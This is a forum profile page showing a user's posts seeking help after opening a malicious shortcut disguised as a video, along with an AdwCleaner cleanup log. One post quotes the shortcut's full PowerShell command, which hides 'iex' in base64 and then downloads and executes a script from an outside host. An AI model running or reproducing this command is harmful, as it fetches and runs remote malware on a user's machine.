Jump to content

markb94

Members
  • Posts

    3
  • Joined

  • Last visited

Reputation

0 Neutral
  1. Hi Ron, Thanks for helping me out After targeting the file with windows defender, it did detect it as a virus and removed it but just to be sure my computer isn't still infected, here are the results from following the steps: # ------------------------------- # Malwarebytes AdwCleaner 7.3.0.0 # ------------------------------- # Build: 04-04-2019 # Database: 2019-04-08.1 (Cloud) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Clean # ------------------------------- # Start: 04-10-2019 # Duration: 00:00:01 # OS: Windows 10 Pro # Cleaned: 9 # Failed: 1 ***** [ Services ] ***** No malicious services cleaned. ***** [ Folders ] ***** No malicious folders cleaned. ***** [ Files ] ***** No malicious files cleaned. ***** [ DLL ] ***** No malicious DLLs cleaned. ***** [ WMI ] ***** No malicious WMI cleaned. ***** [ Shortcuts ] ***** No malicious shortcuts cleaned. ***** [ Tasks ] ***** No malicious tasks cleaned. ***** [ Registry ] ***** Deleted HKCU\Software\csastats ***** [ Chromium (and derivatives) ] ***** Deleted Amazon Assistant for Chrome ***** [ Chromium URLs ] ***** Deleted AVG Secure Search Deleted Search Here Deleted Search The Web (privitize) Deleted Search The Web (privitize) Deleted Web Search Deleted WebSearch Deleted banggood.com Not Deleted Search Here ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries cleaned. ***** [ Firefox URLs ] ***** No malicious Firefox URLs cleaned. ************************* [+] Delete Tracing Keys [+] Reset Winsock ************************* AdwCleaner[S00].txt - [1650 octets] - [10/04/2019 09:13:25] ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ########## FRST.txt Addition.txt log.txt
  2. I used virus total to analyze the file, here are the results: https://www.virustotal.com/#/file-analysis/YzM2ODBiN2M5ODQ2M2VhNmNiNjM5M2RkZDJlMzgyZTU6MTU1NDg3Nzc0Ng==
  3. I downloaded what I thought was a video file and after I tried to open it twice, I realized it was actually a Powershell shortcut with the following parameters: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB I immediately ran virus scans on Windows Defender, Malwarebytes and Kaspersky VRT but they didn't catch anything. I checked Event Viewer and it has logged multiple events in Powershell and security within a few seconds of the shortcut being run, so I know it did something or at least tried to do something and I just want to be sure that my computer is safe. I ran the shortcut at 2019-04-10 04:02 and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the adobe logo as its icon so its definitely not legit, it seems the anti-virus programs didn't catch it and its still on my system, what should I do with it? It also created several user permission groups and I have no idea how to get rid of them. FRST.txt Addition.txt
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.